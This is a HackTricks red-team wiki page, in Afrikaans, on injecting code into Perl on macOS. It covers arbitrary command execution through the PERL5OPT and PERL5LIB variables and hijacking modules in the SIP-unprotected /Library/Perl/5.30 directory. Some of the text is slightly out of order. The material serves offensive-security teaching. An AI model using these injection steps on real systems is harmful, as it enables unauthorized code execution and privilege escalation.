macOS Perl Applications Injection

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Via PERL5OPT & PERL5LIB omgewingsveranderlike

Deur die omgewingsveranderlike PERL5OPT te gebruik, is dit moontlik om perl arbitrêre bevele uit te voer. Byvoorbeeld, skep hierdie skriffie:

test.pl
#!/usr/bin/perl
print "Hello from the Perl script!\n";

Voer nou die omgewingsveranderlike uit en voer die perl skrip uit:

export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"

'n Ander opsie is om 'n Perl-module te skep (bv. /tmp/pmod.pm):

/tmp/pmod.pm
#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value

En gebruik dan die omgewingsveranderlikes:

PERL5LIB=/tmp/ PERL5OPT=-Mpmod

Via afhanklikhede

Dit is moontlik om die afhanklikhede van die Perl wat loop, in 'n lys te vertoon:

perl -e 'print join("\n", @INC)'

macOS Perl-toepassingsinspuiting

Perl-toepassingsinspuiting is 'n tegniek wat gebruik kan word om 'n Perl-toepassing te manipuleer om ongewenste aksies uit te voer. Hierdie tegniek kan gebruik word vir voorregverhoging deur 'n kwaadwillige gebruiker.

/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30

Sommige van die teruggekeerde lêers bestaan selfs nie, maar /Library/Perl/5.30 bestaan wel, dit is nie beskerm deur SIP en dit is voor die lêers wat beskerm word deur SIP. Daarom kan iemand daardie lêer misbruik om skrips afhanklikhede daarin by te voeg sodat 'n hoë-geprivilegeerde Perl-skrip dit kan laai.

Let wel dat jy root moet wees om in daardie lêer te skryf en deesdae sal jy hierdie TCC-prompt kry:

Byvoorbeeld, as 'n skrip use File::Basename; invoer, sou dit moontlik wees om /Library/Perl/5.30/File/Basename.pm te skep om dit arbitrêre kode te laat uitvoer.

Verwysings

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated